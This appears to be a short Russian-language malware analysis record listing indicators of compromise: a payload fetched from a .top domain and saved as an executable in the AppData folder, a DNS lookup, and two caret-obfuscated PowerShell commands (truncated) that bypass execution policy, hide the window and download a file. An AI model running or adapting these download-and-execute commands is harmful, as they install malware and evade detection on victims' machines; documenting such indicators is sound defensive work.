Техническая информация
- http://fortycooola.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^we^rS^HE^lL.eXE^ ^-exECUT^ioN^P^O^L^ICy by^P^a^s^s ^-NOpRO^fiLe -w^INDOwSTy^l^E hiDDEN (N^ew^-^obj^eCT SYs^T^em.nEt.W^eB^C^Li^ENT)^.^Do^wnLOa^dF^i^LE^(^'http://fortycooola.t...
- DNS ASK fo###cooola.top
- '<SYSTEM32>\cmd.exe' /C "p^o^we^rS^HE^lL.eXE^ ^-exECUT^ioN^P^O^L^ICy by^P^a^s^s ^-NOpRO^fiLe -w^INDOwSTy^l^E hiDDEN (N^ew^-^obj^eCT SYs^T^em.nEt.W^eB^C^Li^ENT)^.^Do^wnLOa^dF^i^LE^(^'http://fortycooola.t...' (со скрытым окном)